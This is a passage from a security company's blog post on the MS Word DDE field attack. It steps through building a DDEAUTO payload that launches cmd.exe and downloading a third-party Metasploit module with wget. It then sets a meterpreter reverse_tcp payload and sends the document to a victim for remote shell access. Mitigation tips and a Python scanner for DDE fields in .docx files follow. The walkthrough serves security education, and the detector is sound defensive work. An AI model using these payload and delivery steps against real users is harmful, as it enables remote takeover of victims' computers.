In the Field dialog box, select the Formula option to insert the DDE code.

Fig.2 Insertion in Formula option
After that, you should see a Field inserted into the document with the error "!Unexpected End of Formula". Right-click the Field and choose Toggle Field Codes. We need to craft a DDE object payload in the text field, which will start the malware or any code of our choice when the document is opened.

Fig.3
In the text field, insert the following code to execute notepad.exe when the document is opened.
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k notepad.exe"}
The DDEAUTO keyword informs MS Word that this is a DDE field that executes automatically when the document is opened; the second part is the full path of the executable to run, and the last part, between quotes, contains the arguments passed to that executable (here, execute notepad.exe).
Fig.4
After that, save the document under any name. Once the victim opens the document, notepad.exe is executed after two error messages.


Fig.6
After these two errors, which most users will ignore, notepad gets executed without any macros.

Fig.7
In this way, an attacker can execute malicious code without any user interaction and take full system control.

SYSTEM COMPROMISE USING DDE EXPLOIT IN METASPLOIT:

Since the makers of Metasploit have not released the exploit in their update, we will get the exploit from outside and import it into the Metasploit database. Download the exploit using the command:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
After that, move dde_delivery.rb to the use/share/Metasploit-framework/modules/exploit/windows directory. Then open msfconsole and reload the database using the command reload_all.
After the exploit is loaded in Metasploit, we can use it to exploit our victim. In msfconsole set the parameters below.
Use exploit/windows/dde_delivery
 set SRVHOST
 set payload windows/meterpreter/reverse_tcp
 set LHOST
 set LPORT
 exploit

Fig.8
Once we give the exploit command, it generates a DDE exploit payload. Copy it and paste it into the DDE formula field as described in the example above.
Fig.9
Save the document and send it to the victim. Once the victim opens the document and ignores the error, we get remote access to the system via a meterpreter shell.
Fig.10
Once we get the shell, we can interact with it using the sessions -i command.

Fig.11
In this way, attackers can compromise the system without the user's knowledge and without triggering any alerts from the firewall. Microsoft has released some initial patches for this vulnerability.

MITIGATION FOR DDE VULNERABILITY:

1. Install Windows security updates regularly.
2. Double-check the error messages when opening any MS Office document instead of blindly clicking the OK button.
3. Do not open unnecessary email attachments.
4. Use up-to-date anti-virus and firewall software.
5. Disable the DDE feature in the Windows registry using the key
{HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security} WorkbookLinkWarnings (DWORD) = 2

Since DDE is a genuine Microsoft feature, most antivirus solutions do not flag a warning or block MS Office documents with DDE fields. The best way to protect yourself from such attacks is to always be suspicious of any uninvited document sent via email, and never click on links inside those documents without adequately verifying the source.
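As an added detection example (not part of the original post), the following scans a .docx for DDE/DDEAUTO field instructions, which Word stores in the XML parts under word/ either as <w:instrText> runs inside a complex field or as a <w:fldSimple> element; it reassembles instructions split across several runs and reports any field whose instruction starts with DDE or DDEAUTO, such as the field shown above. The minimal .docx built in the block is a constructed sample, not a real Word file, and the scanner does not cover .rtf or Excel workbook formats.

```python
import html
import io
import re
import zipfile

# WordprocessingML stores a field either as <w:fldSimple w:instr="..."> or as a
# complex field: fldChar begin, one or more <w:instrText> runs, fldChar end.
_FLD_SIMPLE = re.compile(r'<w:fldSimple\b[^>]*\bw:instr="([^"]*)"')
_FIELD_BEGIN = re.compile(r'<w:fldChar\b[^>]*\bw:fldCharType="begin"')
_FIELD_END = re.compile(r'<w:fldChar\b[^>]*\bw:fldCharType="end"')
_INSTR_TEXT = re.compile(r"<w:instrText\b[^>]*>(.*?)</w:instrText>", re.S)
_DDE_KEYWORD = re.compile(r"^\s*DDE(AUTO)?\b", re.I)


def field_instructions(xml):
    """Yield the complete instruction string of every field in one XML part.

    Word may split one instruction across several instrText runs, so the runs
    between a begin marker and its end marker are joined before inspection.
    (Nested fields are not unrolled here.)
    """
    for m in _FLD_SIMPLE.finditer(xml):
        yield html.unescape(m.group(1))
    pos = 0
    while True:
        begin = _FIELD_BEGIN.search(xml, pos)
        if begin is None:
            break
        end = _FIELD_END.search(xml, begin.end())
        stop = end.end() if end else len(xml)
        pieces = _INSTR_TEXT.findall(xml, begin.end(), stop)
        yield html.unescape("".join(pieces))
        pos = stop


def find_dde_fields(docx_bytes):
    """Return [(part_name, instruction)] for every DDE/DDEAUTO field in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            # body, headers, footers and footnotes all live under word/
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = z.read(name).decode("utf-8", errors="replace")
            for instr in field_instructions(xml):
                if _DDE_KEYWORD.match(instr):
                    hits.append((name, instr.strip()))
    return hits


# Constructed samples: the field from this post (opens notepad) and a harmless DATE field.
SAMPLE_DDE_FIELD = ' DDEAUTO c:\\windows\\system32\\cmd.exe "/k notepad.exe" '
SAMPLE_BENIGN_FIELD = ' DATE \\@ "d MMMM yyyy" '


def build_sample_docx(instruction):
    """Build a minimal, constructed .docx with one complex field split over two runs."""
    half = len(instruction) // 2
    body = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p>"
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{html.escape(instruction[:half])}</w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{html.escape(instruction[half:])}</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        "<w:r><w:t>!Unexpected End of Formula</w:t></w:r>"
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        "</w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", body)
    return buf.getvalue()
```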
BriskInfosec provides the world's best security solutions. For the best security solutions reach us @ Contact@briskinfosec.com.

REFERENCES:

1) https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
2) https://technet.microsoft.com/en-us/library/security/4053440.aspx

AUTHOR

Dawood Ansar
Security Engineer
BriskInfosec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/dawood-ansar-29403213b/